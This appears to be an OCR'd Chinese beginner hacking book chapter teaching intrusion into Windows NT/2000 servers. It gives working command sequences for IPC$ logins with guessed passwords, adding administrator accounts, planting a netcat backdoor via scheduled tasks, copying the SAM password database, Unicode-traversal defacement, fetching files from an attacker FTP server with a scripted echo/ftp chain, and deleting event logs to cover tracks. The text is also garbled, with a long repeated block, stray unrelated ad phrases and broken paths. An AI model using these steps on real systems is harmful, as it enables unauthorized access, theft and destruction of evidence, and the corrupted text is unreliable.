一般入侵所需要的12个常用命令
一般入侵所需要的12个常用命令
1.NET
只要你拥有某用户名和密码,那就用IPC$做连接吧!
这里我们假定你得到的用户是hbx,密码是123456。假设对方IP是127。0。0。1
net use \127.0.0.1ipc$ "123456" /user:"hbx"
退出的命令是net use \127.0.0.1ipc$ /delte
只要你拥有某IP的用户名和密码交换空间设计图,那就用IPC$做连接吧!
这里我们假定你得到的用户是hbx ,密码是123456。假设对方IP为127.0.0.1。
net use \127.0.0.1ipc$ "123456" /user: "hbx"
退出的命令是:
net use \127.0.0.1ipc$ /delte
下面的操作你必须登录后才可以用,登录的方法下面的操作你必须登录后才可以用,登录的方法就在上面。
下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户。
我们加一个heibai的用户密码为lovechinanet user heibai lovechina /add
只要显示命令成功,那么我们可以把他加入,由于SA的权限相当于系统的超级用户。
我们加一逐步共聚合heibai的用户密码为lovexhinanet uset heibai lovechina /add
只要显示命令成功,那么我们可以反把他加入,由于SA的权限相当于系统的超级用户。
我们加一逐步共Administrator组了。
net localgroup Administrators heibai /add
这里是讲映射对方的C盘,当然其他盘也可以, 只要存在就行了。我们这里把对方的C盘映射到本地 的Z盘。
net use z:\127.0.0.1c$
net start telnet
这样可以打开对方的TELNET服务。
这里是将Guest用户激活,guest是NT的默认用 户,而且无法删除呢!不知道是否这样?我的Win dows2000就是删除不了它。
net user guest /active:yes
这里是把一个用户的密码改掉,我们把guest的 40
第1 章菜鸟黑客入门
密码改为lovechina,其他用户也可以的。只要有权 限就行了呀! net user guest lovechina
net命令果然强大啊! 2.at
一般一个入侵者入侵后都会留下后门,也就是
种木马了,你把木马传了上去,怎么启动它呢? 需要用AT命令,这里假设你已经登录了那个服
务器。 你首先要得到对方的时间: net time \127.0.0.1
将会返回一个时间,这里假设时间为12:1,现
在需要新建一个作业,其ID=1: at \127.0.0.1 12:3 nc.exe
这里假设了一个木马,名为NC.EXE,这个东西
要在对方服务器上。 这里介绍一下NC,NC是NETCAT的简称,为了方
便输入,一般会被改名,它是一个TELNET服务,端
口为99。 等到了12:3就可以连接到对方的99端口,这样
就给对方种下了木马。 3.telnet
这个命令非常实用,它可以与远方做连接,不过
正常情况下需要密码、用户,但你给对方种了木马,
可直接连到这个木马打开的端口。 telnet 127.0.0.1 99
这样就可以连到对方的99端口,那你就可以在
对方运行命令了,这个也就是肉鸡。 4.FTP
它可以将你的东西传到对方电脑上,你可以去
申请个支持FTP上传的空间,国内多的是,如果真的
找不到,我给个WWW.51.NET,不错的,当我们申请
完后,它会给用户名、密码以及FTP服务器。 在上传前需要先登录,这里我们假设FTP服务器
是WWW.51.NET,用户名是HUCJS,密码是654321。 ftp www.51.net
他会要求输入用户,成功后会要求输入密码。 下面先说上传,假设你需上传的文件是INDEX. HTM,它位于C:下,传到对方D::
get c:index.htm d:
假设你要把对方C盘下的INDEX.HTM,下到你的 电脑的D盘下:
put c:index.htm d: 5.copy
下面我说说怎样把本地的文件复制到对方硬盘
上去,需要建立好IPC$连接才有效。
这里我们把本地C盘下的index.htm复制到127. 0.0.1的C盘下:
copy index.htm \127.0.0.1c$index.htm
如果你要复制到D盘下,把C改为D就行了!
copy index.htm \127.0.0.1d$index.htm
如果你要把它复制到WINNT目录里:
copy index.htm \127.0.0.1admin$index.
htm
admin$是winnt
要把对方的文件复制过来交换空间 小户型,顺便告诉大家NT的 备份的数据库放在x:winntrepairsam._ sam._是 数据库的文件名
下面就把127.0.0.1的数据库复制到本地C盘下
copy \127.0.0.1admin$repairsam._ c: 6.set
如果你跑进了一部电脑,而且想黑它(这思想只
能在特别的时候才准有),当然他的80端口要开,不
然你黑给谁看?这时需要用SET命令! 下面是我得到的结果!我来分析它,只是找主 页在哪而已。
COMPUTERNAME=PENTIUMII
ComSpec=D:WINNTsystem32cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
http_ACCEPT=*/*
http_ACCEPT_LANGUAGE=zh-cn
http_CONNECTION=Keep-Alive
http_HOST=当前登录者的IP交换空间北京报名,这里本来是显示 我的IP,被我删除了 41
http_ACCEPT_ENCODING=gzip, deflate
http_USER_AGENT=Mozilla/4.0 (compatible;
MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:WINNTsystem32os2dll;
OS=Windows_NT
Path=D:WINNTsystem32;D:WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:vlroot主页放在的地址, 只要你看到PATH_TRANSLATED=的后面就是主页的存 放地址。这里是E:vlrootPROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/sys
tem32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=http/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用 IIS/3.0
SystemDrive=D:
SystemRoot=D:WINNT
TZ=GMT-9
USERPROFILE=D:WINNTProfilesDefault User
windir=D:WINNT
粉红色的那行就是对方主页存放地址,这里告 诉大家一个技巧,很笨的技巧啊,不过只能用这个
方法才能100%地找到主页的名称,当你DIR这个目
录时,一定会看到很多文件,你可以把所有文件在
浏览器这样输入XX.XX.XX.XX/文件名,这样只要看
到和XX.XX.XX.XX看到的页面一模一样,那么这就 42 是主页的名称了。 7.nbtstat
如果你扫到一部WindowsNT的电脑,他的136到
139其中一个端口开了的话,就要用这个命令得到用
户了。顺便告诉大家这是netbios,得到用户名后就
可以猜猜密码了。例如比较简单的密码,密码和用
户名一样的,都试一下,不行就暴力破解吧! 现在网上很多NT的机子都开了这些端口的,你
可以练习一下,我们来分析得到的结果。 命令是 nbtstat -A XX.XX.XX.XX
-A一定要大写哦。 下面是得到的结果。 NetBIOS Remote Machine Name Table
Name Type Status
Registered Registered Registered Regis
tered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
粉红色的就是登录过这部系统的用户交换空间 卧室,可能你
不知道怎么看,大家是不是看到了一串数字,只要
这串数字是<03>的话,那他前面的就是用户。 这里的用户是PENTIUMII。 8.Shutdown
关了对方的NT服务器的命令
Shutdown \IP地址 t:2020秒后将NT自动关闭,三思后才能运行这个命
第1 章菜鸟黑客入门
令,这样会给对方造成很大的损失,要做个有良心
的入侵者呀。 9.DIR
这个命令没什么好讲,但是却非常重要,他是查
看一目录里的所有文件、文件夹。
你可以在本地试一下。 10.echo
著名的漏洞Unicode装修交换空间,这个命令可以简单地黑一
下有这个漏洞的主机。
假设我们要把“实践是检验真理的唯一标准!” 写入index.htm,有两种方法,大家看看有什么区别。
echo 实践是检验真理的唯一标准!>index.htmecho 实践是检验真理的唯一标准!>>index.htm
第一个的意思是覆盖index.htm原有的内容,把 “实践是检验真理的唯一标准!”写进index.htm。
第二个的意思是把“实践是检验真理的唯一标
准!”加到index.htm里面。
“>>”产生的内容将追加进文件中,“>”则将原 文件内容覆盖。
大家可以在本地试一下。
可能你会问,这样简单黑一下有什么好玩的,其 实他可以用来下载主页到对方的目录里。 (1)首先,我们需要申请一个免费的主页空间。
(2)用echo在可写目录下建立如下内容的txt文
件:(以chinren服务器为例。)
open upload.chinaren.com(你的FTP服务器,
申请时你的空间提供商会给你的)
cnhack(你申请时的用户名)
test(你申请时的密码)
get index.htm c:inetpubwwwrootindex.htm(这 里是把你空间上的index.htm 下载到对方的c:
inetpubwwwrootindex.htm)..
bye(退出FTP对话,相当在98下的DOS,用EXIT 退出DOS)
具体的做法:
输入 echo open upload.chinaren.com> c: cnhack.txt
输入 echo cnhack >>c:cnhack.txt
输入 echo 39abs >>c:cnhack.txt
输入 echo get index.htm c:
inetpubwwwrootindex.htm+>>+c:cnhack.txt 最后输入 ftp -s:c:cnhack.txt (利用ftp
的-s 参数,执行文件里的内容。) 等命令完成时,文件已经下载到你指定的文件
里了。 注意:取得文件后,请删除cnhack.txt。(如
果不删除,很容易会给别人看到你的密码。) 记得要 del c:cnhack.txt 11.attrib
这个命令是设置文件属性的。如果你想黑一个
站,而它的主页的文件属性设置了只读,那就很可
怜呀,想删除他也不行,想覆盖他也不行。倒!不
过有这个命令就别怕了。 attrib -r index.htm
这个命令是把index.htm的只读属性去掉。 如果把“-”.. 改为“+”.. 则是把这个文件的属性设
置为只读。 attrib +r index.htm
这个命令是把index.htm的属性设置为只读。 12.del
当你看到这个标题可别倒下啊!现在要离开 127.0.0.1了,要删除日志,当然要删除日志啦!想
被捉吗。呵呵。 WindowsNT的日志有这些: del C:winntsystem32logfiles*.*
del C:winntssytem32config*.evt
del C:winntsystem32dtclog*.*
del C:winntsystem32*.log
del C:winntsystem32*.txt
del C:winnt*.txt
del C:winnt*.log
只要删除这些就可以了。有些WindowsNT安装在 D盘或其他盘,就要把C 改成相应的盘。 43
44
第2 章Windows 攻防
菜鸟必备IPC$ 详细解释大全
关于IPC$入侵的文章可谓多如牛毛,而且
也不乏优秀之作,攻击步骤甚至可以说已经成
为经典的模式,因此也没人愿意再把这已经成
为定式的东西拿出来摆弄。不过话虽这样说,但
我个人认为这些文章讲解的并不详细,对于第
一次接触ipc$的菜鸟来说,简单的罗列步骤并
不能解答他们的种种迷惑。因此我参考了部分
资料,教程以及网上的论坛帖子,写了这篇总结
性质的文章,想把一些容易混淆,容易迷惑人的
问题说清楚,让大家不要总徘徊在原地!
一、什么是IPC$
IPC$(Internet Process Connection) 是共享
“.. 命名管道”.. 的资源,.. 它是为了让进程间通信而开放
的命名管道,.. 通过提供可信任的用户名和口令,.. 连
接双方可以建立安全的通道并以此通道进行加密数
据的交换,.. 从而实现对远程计算机的访问。IPC$ 是
NT/2000 的一项新功能,.. 它有一个特点,.. 即在同一时
间内,.. 两个IP 之间只允许建立一个连接。NT/2000
在提供了IPC$ 功能的同时,.. 在初次安装系统时还打
开了默认共享,.. 即所有的逻辑共享(c$,d$,e$..)
和系统目录Winnt 或Windows(Admin$) 共享。所有的
这些,.. 微软的初衷都是为了方便管理员的管理交换空间的网址,.. 但
在有意无意中,.. 导致了系统安全性的降低。
平时我们总能听到有人在说IPC$ 漏洞,.. 其实
IPC$ 并不是一个真正意义上的漏洞, 我想之所以有人
这么说,.. 一定是指微软自己安置的那个‘.. 后门’:.. 空
会话(Null session )。那么什么是空会话呢?
二、什么是空会话
在介绍空会话之前,.. 我们有必要了解一下一个
安全会话是如何建立的。
在Windows NT 4.0 中是使用挑战响应协议与远
程机器建立一个会话的,.. 建立成功的会话将成为一
个安全隧道,.. 建立双方通过它互通信息,.. 这个过程
的大致顺序如下:
1).. 会话请求者(.. 客户).. 向会话接收者(.. 服务器)
传送一个数据包,.. 请求安全隧道的建立;
2).. 服务器产生一个随机的64 位数(.. 实现挑战)
传送回客户;
3).. 客户取得这个由服务器产生的64 位数,.. 用试
图建立会话的账号的口令打乱它,.. 将结果返回到服
务器(.. 实现响应);..
4 ).. 服务器接受响应后发送给本地安全验证
(LSA),LSA 通过使用该用户正确的口令来核实响应
以便确认请求者身份。如果请求者的账号是服务器
的本地账号,.. 核实本地发生;.. 如果请求的账号是一
个域的账号,.. 响应传送到域控制器去核实。当对挑
战的响应核实为正确后,.. 一个访问令牌产生,.. 然后
传送给客户。客户使用这个访问令牌连接到服务器
上的资源直到建议的会话被终止。
以上是一个安全会话建立的大致过程,.. 那么空
会话又如何呢?
空会话是在没有信任的情况下与服务器建立的
会话(.. 即未提供用户名与密码),.. 但根据WIN2000 的
访问控制模型,.. 空会话的建立同样需要提供一个令
牌,.. 可是空会话在建立过程中并没有经过用户信息
的认证,所以这个令牌中不包含用户信息,因此,这
个会话不能让系统间发送加密信息,.. 但这并不表示
空会话的令牌中不包含安全标识符SID(.. 它标识了用
户和所属组),.. 对于一个空会话,LSA 提供的令牌的
SID 是S-1-5-7,.. 这就是空会话的SID,.. 用户名是:
ANONYMOUS LOGON(.. 这个用户名是可以在用户列表中
看到的,.. 但是是不能在SAM 数据库中找到,属于系统内置的账号),这个访问令牌包含下面伪装的组: Everyone
Network
在安全策略的限制下,这个空会话将被授权访
问到上面两个组有权访问到的一切信息。那么建立
空会话到底可以作什么呢? 三、空会话可以做什么 对于NT,在默认安全设置下,借助空连接可以
列举目标主机上的用户和共享,访问everyone权限
的共享,访问小部分注册表等,并没有什么太大的
利用价值;对2000作用更小,因为在Windows 2000
和以后版本中默认只有管理员和备份操作员有权从
网络访问到注册表,而且实现起来也不方便,需借
助工具。从这些我们可以看到,这种非信任会话并
没有多大的用处,但从一次完整的IPC$入侵来看,
空会话是一个不可缺少的跳板,因为我们从它那里
可以得到用户列表,这对于一个老练的黑客已经足
够了。以下是空会话中能够使用的具体命令: 1.首先,我们先建立一个空会话(需要目标开放
IPC$)
命令:net use \ipIPC$ ""/user:"" 注意:上面的命令包括四个空格,net与use中 间有一个空格,use后面一个,密码左右各一个空格。 2.查看远程主机的共享资源
命令:net view \IP
解释:建立了空连接后,用此命令可以查看远程
主机的共享资源,如果它开了共享,可以得到如下
类似类似结果:
在 \*.*.*.*的共享资源 资源共享名类型用途注释
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。 3.查看远程主机的当前时间
命令:net time \IP
解释:用此命令可以得到一个远程主机的当前
时间。 4.得到远程主机的NetBIOS用户名列表(需要打
开自己的NBT)
nbtstat -A IP
用此命令可以得到一个远程主机的NetBIOS 用 46 户名列表(需要你的netbios支持),返回如下结果:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
IS~SERVER......<00> UNIQUE Registered
MAC Address = 00-50-8B-9A-2D-37
以上就是我们经常使用空会话做的事情
,能获 得不少东西,不过要注意一点:建立IPC$连接的操 作会在EventLog中留下记录,不管你是否登录成功。 好了,那么下面我们就来看看IPC$所使用的端口是 什么? 四、IPC$所使用的端口 首先我们来了解一些基础知识: 1.SMB:(Server Message Block) Windows协议
族,用于文件打印共享的服务;
2.NBT:(NetBIOS Over TCP/IP)使用137(UDP)
138(UDP)139(TCP)端口实现基于TCP/IP协议的
NetBIOS网络互联。
3.在WindowsNT中SMB基于NBT实现,而在Windows2000中,SMB除了基于NBT实现,还可以直接通
过445端口实现。
有了这些基础知识,我们就可以进一步来讨论
访问网络共享对端口的选择了:
对于Win2000客户端来说: 1.如果在允许NBT的情况下连接服务器时,客户
端会同时尝试访问139和445端口,如果445端口有
响应,那么就发送RST包给139端口断开连接,用455
端口进行会话,当445端口无响应时,才使用139端
口,如果两个端口都没有响应,则会话失败;
2.如果在禁止NBT的情况下连接服务器时,那么
客户端只会尝试访问445端口,如果445端口无响应,
那么会话失败。由此可见,禁止了NBT后的win 2000第2 章 Windows 攻防
对win NT的共享访问将会失败。
对于Win2000服务器端来说: 1.如果允许NBT, 那么UDP端口137, 138, TCP
端口 139, 445将开放;
2.如果禁止NBT,那么只有445端口开放。
我们建立的IPC$会话对端口的选择同样遵守以
上原则。显而易见,如果远程服务器没有监听139或
445端口,IPC$会话是无法建立的。 五、IPC$连接在hack攻击中的意义 就像上面所说的,即使你建立了一个空的连接,
你也可以获得不少的信息(而这些信息往往是入侵
中必不可少的),如果你能够以某一个具有一定权限
的用户身份登陆的话,那么你就会得到相应的权限,
显然,如果你以管理员身份登陆,嘿嘿,那你可就了
不得了,基本上可以为所欲为了。不过你也不要高
兴得太早,因为管理员的密码不是那么好搞到的,虽
然会有一些粗心的管理员存在弱口令,但这毕竟是
少数,而且现在不比从前了,随着人们安全意识的
提高,管理员们也愈加小心了,得到管理员密码将
会越来越难的,因此今后你最大的可能就是以极小
的权限甚至是没有权限进行连接,甚至在主机不开
启IPC$共享时,你根本就无法连接,你会慢慢地发
现IPC$连接并不是万能的,所以不要奢望每次连接
都能成功,那是不现实的。 是不是有些灰心?倒也不用,关键是我们要摆
正心态,不要把IPC$入侵当作终极武器,不要认为
它战无不胜,它只是很多入侵方法中的一种,你有可
能利用它一击必杀,也有可能一无所获,这些都是
正常的,在黑客的世界里,不是每条大路都能通往
罗马,但总有一条路会通往罗马,耐心地寻找吧! 六、IPC$连接失败的常见原因 以下是一些常见的导致IPC$连接失败的原因: 1.IPC连接是Windows NT及以上系统中特有的
功能,由于其需要用到Windows NT中很多DLL函数,
所以不能在Windows 9.x/Me系统中运行,也就是说
只有nt/2000/xp才可以相互建立IPC$连接,98/me
是不能建立IPC$连接的;
2.如果想成功地建立一个IPC$连接,就需要对
方开启IPC$共享,即使是空连接也是这样,如果对
方关闭了IPC$共享,你将会建立失败;
3.你未启动Lanmanworkstation服务交换空间重播,它提供网
络链结和通讯,没有它你无法发起连接请求(显示
名为:Workstation);.. 4.对方未启动Lanmanserver 服务,它提供了
RPC 支持、文件、打印以及命名管道共享,IPC$依
赖于此服务,没有它远程主机将无法响应你的连接
请求(显示名为:Server);..
5.对方未启动NetLogon,它支持网络上计算机
pass-through 账户登录身份;
6.对方禁止了NBT(即未打开139端口);..
7.对方防火墙屏蔽了139和445端口;
8.你的用户名或者密码错误(显然空会话排除
这种错误);..
9.命令输入错误:可能多了或少了空格,当用户
名和密码中不包含空格时两边的双引号可以省略,
如果密码为空,可以直接输入两个引号"" 即可;
10 如果在已经建立好连接的情况下对方重启计
算机,那么IPC$连接将会自动断开,需要重新建立
连接。 另外,你也可以根据返回的错误号分析原因: 错误号5,拒绝访问:很可能你使用的用户不是
管理员权限的,先提升权限; 错误号51,Windows无法找到网络路径:网络有
问题; 错误号53,找不到网络路径:ip地址错误;目
标未开机;目标lanmanserver服务未启动;目标有
防火墙(端口过滤);.. 错误号67,找不到网络名:你的lanmanworkstation
服务未启动或者目标删除了IPC$;
错误号1219,提供的凭据与已存在的凭据集冲
突:你已经和对方建立了一个IPC$,请删除再连;
错误号1326,未知的用户名或错误密码:原因
很明显了;
错误号1792,试图登录,但是网络登录服务没
有启动:目标NetLogon服务未启动;
错误号2242,此用户的密码已经过期:目标有
账号策略,强制定期要求更改密码。 七、复制文件失败的原因 有些朋友虽然成功地建立了IPC$ 连接,但在
copy时却遇到了这样那样的麻烦,无法复制成功,那
么导致复制失败的常见原因又有哪些呢? 1.盲目复制
这类错误出现的最多,占到50%以上。许多朋友 47
甚至都不知道对方是否有共享文件夹,就进行盲目
复制,结果导致复制失败而且郁闷的很。因此我建
议大家在进行复制之前务必用net view \IP这个
命令看一下对方的共享情况,不要认为IPC$连接建
立成功了就一定有共享文件夹。 2.默认共享判断错误
这类错误也是大家经常犯的,主要有两个小方面: 1)错误地认为能建立IPC$连接的主机就一定开
启了默认共享,因而在建立完连接之后马上向
admin$ 之类的默认共享复制文件,导致复制失败。
IPC$连接成功只能说明对方打开了IPC$共享,IPC$
共享与默认共享是两码事,IPC$共享是一个命名管
道,并不是哪个实际的文件夹,而默认共享并不是
IPC$共享的必要条件; 2)由于net view \IP 无法显示默认共享(因
为默认共享带$),因此通过这个命令,我们并不能
判断对方是否开启了默认共享,因此如果对方未开
启默认共享,那么所有向默认共享进行的操作都不
能成功;(不过大部分扫描软件在扫弱口令的同时,
都能扫到默认共享目录,可以避免此类错误的发生) 3. 用户权限不够,包括四种情形
1)空连接向所有共享(默认共享和普通共享)复
制时,大多情况下权限是不够的; 2)向默认共享复制时,要具有管理员权限; 3)向普通共享复制时,要具有相应权限(即对
方事先设定的访问权限);.. 4)对方可以通过防火墙或安全软件的设置,禁
止外部访问共享; 还需要说明一点:不要认为administrator就一
定是管理员,管理员名称是可以改的。 4.被防火墙杀死或在局域网
也许你的复制操作已经成功,但当远程运行时,
被防火墙杀掉了,导致找不到文件;还有可能你把
木马复制到了局域网内的主机,导致连接失败。因
此建议你复制时要小心,否则就前功尽弃了。 大家也知道,IPC$连接在实际操作过程中会出
现千奇百怪的问题,上面我所总结的只是一些常见
错误,没说到的,只能让大家自己去体会了。 八、如何打开目标的IPC$共享以及
其他共享 目标的IPC$不是轻易就能打开的,否则就要天
下打乱了。你需要一个admin 权限的shell,比如 48 telnet、木马等,然后在shell下执行net shareIPC$来开放目标的IPC$,用net share IPC$ /del
来关闭共享。如果你要给它开共享文件夹,你可以
用net share baby=c:,这样就把它的c盘命名为
baby共享了。 九、一些需要shell才能完成的命令 看到很多教程这方面写的十分不准确,一些需
要shell才能完成命令就简简单单地在IPC$连接下
执行了,起了误导作用。那么下面我总结一下需要
在shell才能完成的命令: 1.向远程主机建立用户,激活用户,修改用户密
码,加入管理组的操作需要在shell下完成;
2.打开远程主机的IPC$共享央视交换空间,默认共享,普通
共享的操作需要在shell下完成;
3.运行/关闭远程主机的服务,需要在shell下
完成;
4.启动/杀掉远程主机的进程,也需要在shell
下完成。
十、入侵中可能会用到的相关命令 请注意命令适用于本地还是远程,如果适用于
本地,你只能在获得远程主机的shell后,才能向远
程主机执行。 1.建立空连接
net use \IPIPC$ ""/user:""
2.建立非空连接
net use \IPIPC$ "psw" /user:"account"
3.查看远程主机的共享资源(但看不到默认共享)
net view \IP
4.查看本地主机的共享资源(可以看到本地的
默认共享)
net share 5.得到远程主机的用户名列表
nbtstat -A IP
6.得到本地主机的用户列表
net user
7.查看远程主机的当前时间
net time \IP
8.显示本地主机当前服务
net start
9.启动/关闭本地服务
net start 服务名 /y第2 章 Windows 攻防
net stop 服务名 /y 10.映射远程共享
net use z: \IPbaby
此命令将共享名为baby的共享资源映射到z盘
11.删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del /y删除全部
12.向远程主机复制文件
copy 路径srv.exe \IP共享目录名,如:
copy ccbirds.exe \*.*.*.*c 即将当前目录
下的文件复制到对方c 盘内 13.远程添加计划任务
at \ip 时间程序名,如:
at \127.0.0.0 11:00 love.exe
注意:时间尽量使用24小时制;在系统默认搜
索路径(比如system32/)下不用加路径,否则必须
加全路径 14.开启远程主机的telnet
这里要用到一个小程序:opentelnet.exe,各
大下载站点都有,而且还需要满足四个要求: 1)目标开启了IPC$共享 2)你要拥有管理员密码和账号 3)目标开启RemoteRegistry服务,用户就该
ntlm认证 4)对WIN2K/XP有效,NT未经测试 命令格式:OpenTelnet.exe \server account psw NTLM认证方式 port
试例如下:c:>OpenTelnet.exe \*.*.*.*
administrator ""1 90 15.激活用户/加入管理员组
1)net uesr account /active:yes
2)net localgroup administrators account
/add
16.关闭远程主机的telnet
同样需要一个小程序:ResumeTelnet.exe
命令格式:ResumeTelnet.exe \server account psw
试例如下:c:>ResumeTelnet.exe \*.*.*.*
administrator ""
17.删除一个已建立的IPC$连接
net use \IPIPC$ /del
十一、IPC$完整入侵步骤祥解 其实入侵步骤随个人爱好有所不同,下面是一 般常见的。 1.用扫描软件搜寻存在弱口令的主机,比如流
光,SSS,X-scan等,随你的便,然后锁定目标,如
果扫到了管理员权限的口令,你可以进行下面的步骤
了,假设你现在得到了administrator的密码为空。
2. 此时你有两条路可以选择:要么给对方开
telnet(命令行),要么给它传木马(图形界面)先
用telnet吧。
3.上面开telnet 的命令没忘吧,要用到
opentelnet这个小程序
c:>OpenTelnet.exe \192.168.21.* admin
istrator ""1 90
如果返回如下信息: Remote Telnet Configure, by refdom
Email: refdom@263.net
OpenTelnet.exe
Usage:OpenTelnet.exe \server username
password NTLMAuthor telnetport
Connecting \192.168.21.*...Successfully!
NOTICE!!!!!!
The Telnet Service default setting:
NTLMAuthor=2 TelnetPort=23
Starting telnet service...
telnet service is started successfully!
telnet service is running!
BINGLE!!!Yeah!!
Te>>>QQ470681378
1.NET
只要你拥有某用户名和密码,那就用IPC$做连接吧!
这里我们假定你得到的用户是hbx,密码是123456。假设对方IP是127。0。0。1
net use \127.0.0.1ipc$ "123456" /user:"hbx"
退出的命令是net use \127.0.0.1ipc$ /delte
只要你拥有某IP的用户名和密码交换空间设计图,那就用IPC$做连接吧!
这里我们假定你得到的用户是hbx ,密码是123456。假设对方IP为127.0.0.1。
net use \127.0.0.1ipc$ "123456" /user: "hbx"
退出的命令是:
net use \127.0.0.1ipc$ /delte
下面的操作你必须登录后才可以用,登录的方法下面的操作你必须登录后才可以用,登录的方法就在上面。
下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户。
我们加一个heibai的用户密码为lovechinanet user heibai lovechina /add
只要显示命令成功,那么我们可以把他加入,由于SA的权限相当于系统的超级用户。
我们加一逐步共聚合heibai的用户密码为lovexhinanet uset heibai lovechina /add
只要显示命令成功,那么我们可以反把他加入,由于SA的权限相当于系统的超级用户。
我们加一逐步共Administrator组了。
net localgroup Administrators heibai /add
这里是讲映射对方的C盘,当然其他盘也可以, 只要存在就行了。我们这里把对方的C盘映射到本地 的Z盘。
net use z:\127.0.0.1c$
net start telnet
这样可以打开对方的TELNET服务。
这里是将Guest用户激活,guest是NT的默认用 户,而且无法删除呢!不知道是否这样?我的Win dows2000就是删除不了它。
net user guest /active:yes
这里是把一个用户的密码改掉,我们把guest的 40
第1 章菜鸟黑客入门
密码改为lovechina,其他用户也可以的。只要有权 限就行了呀! net user guest lovechina
net命令果然强大啊! 2.at
一般一个入侵者入侵后都会留下后门,也就是
种木马了,你把木马传了上去,怎么启动它呢? 需要用AT命令,这里假设你已经登录了那个服
务器。 你首先要得到对方的时间: net time \127.0.0.1
将会返回一个时间,这里假设时间为12:1,现
在需要新建一个作业,其ID=1: at \127.0.0.1 12:3 nc.exe
这里假设了一个木马,名为NC.EXE,这个东西
要在对方服务器上。 这里介绍一下NC,NC是NETCAT的简称,为了方
便输入,一般会被改名,它是一个TELNET服务,端
口为99。 等到了12:3就可以连接到对方的99端口,这样
就给对方种下了木马。 3.telnet
这个命令非常实用,它可以与远方做连接,不过
正常情况下需要密码、用户,但你给对方种了木马,
可直接连到这个木马打开的端口。 telnet 127.0.0.1 99
这样就可以连到对方的99端口,那你就可以在
对方运行命令了,这个也就是肉鸡。 4.FTP
它可以将你的东西传到对方电脑上,你可以去
申请个支持FTP上传的空间,国内多的是,如果真的
找不到,我给个WWW.51.NET,不错的,当我们申请
完后,它会给用户名、密码以及FTP服务器。 在上传前需要先登录,这里我们假设FTP服务器
是WWW.51.NET,用户名是HUCJS,密码是654321。 ftp www.51.net
他会要求输入用户,成功后会要求输入密码。 下面先说上传,假设你需上传的文件是INDEX. HTM,它位于C:下,传到对方D::
get c:index.htm d:
假设你要把对方C盘下的INDEX.HTM,下到你的 电脑的D盘下:
put c:index.htm d: 5.copy
下面我说说怎样把本地的文件复制到对方硬盘
上去,需要建立好IPC$连接才有效。
这里我们把本地C盘下的index.htm复制到127. 0.0.1的C盘下:
copy index.htm \127.0.0.1c$index.htm
如果你要复制到D盘下,把C改为D就行了!
copy index.htm \127.0.0.1d$index.htm
如果你要把它复制到WINNT目录里:
copy index.htm \127.0.0.1admin$index.
htm
admin$是winnt
要把对方的文件复制过来交换空间 小户型,顺便告诉大家NT的 备份的数据库放在x:winntrepairsam._ sam._是 数据库的文件名
下面就把127.0.0.1的数据库复制到本地C盘下
copy \127.0.0.1admin$repairsam._ c: 6.set
如果你跑进了一部电脑,而且想黑它(这思想只
能在特别的时候才准有),当然他的80端口要开,不
然你黑给谁看?这时需要用SET命令! 下面是我得到的结果!我来分析它,只是找主 页在哪而已。
COMPUTERNAME=PENTIUMII
ComSpec=D:WINNTsystem32cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
http_ACCEPT=*/*
http_ACCEPT_LANGUAGE=zh-cn
http_CONNECTION=Keep-Alive
http_HOST=当前登录者的IP交换空间北京报名,这里本来是显示 我的IP,被我删除了 41
http_ACCEPT_ENCODING=gzip, deflate
http_USER_AGENT=Mozilla/4.0 (compatible;
MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:WINNTsystem32os2dll;
OS=Windows_NT
Path=D:WINNTsystem32;D:WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:vlroot主页放在的地址, 只要你看到PATH_TRANSLATED=的后面就是主页的存 放地址。这里是E:vlrootPROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/sys
tem32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=http/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用 IIS/3.0
SystemDrive=D:
SystemRoot=D:WINNT
TZ=GMT-9
USERPROFILE=D:WINNTProfilesDefault User
windir=D:WINNT
